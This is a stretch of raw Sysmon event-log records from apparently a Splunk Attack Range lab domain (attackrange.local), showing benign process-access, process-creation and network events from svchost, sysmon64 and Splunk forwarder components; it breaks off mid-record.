16:31:21.060{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061432Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:21.060{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061431Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:21.060{7F8C56E7-4E3A-6063-0500-00000000AF01}4121572C:\Windows\system32\csrss.exe{7F8C56E7-5259-6063-2F01-00000000AF01}1092C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061430Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:21.060{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-5259-6063-2F01-00000000AF01}1092C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061429Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:21.061{7F8C56E7-5259-6063-2F01-00000000AF01}1092C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000246196Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:21.535{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-5259-6063-C022-00000000AF01}3708C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246195Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:21.535{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246194Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:21.535{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246193Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:21.535{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246192Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:21.535{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246191Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:21.535{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246190Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:21.535{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246189Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:21.535{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246188Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:21.535{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246187Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:21.535{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246186Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:21.535{CB4067E1-304A-6062-0500-00000000AF01}392408C:\Windows\system32\csrss.exe{CB4067E1-5259-6063-C022-00000000AF01}3708C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000246185Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:21.535{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-5259-6063-C022-00000000AF01}3708C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000246184Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:21.536{CB4067E1-5259-6063-C022-00000000AF01}3708C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000246183Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:21.394{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C6B6CE27E2FDBC65B321089B3F4A4F0,SHA256=4E0046D2E852E4398F327531C367B3450D12FBFBE4EC7D2BFCF9EECD30BF1F6E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000246182Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:19.624{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64803-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 10341000x8000000000000000246226Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:22.941{CB4067E1-525A-6063-C222-00000000AF01}38762776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246225Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:22.832{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-525A-6063-C222-00000000AF01}3876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246224Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:22.832{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246223Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:22.832{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246222Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:22.832{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246221Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:22.832{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246220Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:22.832{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246219Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:22.832{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1e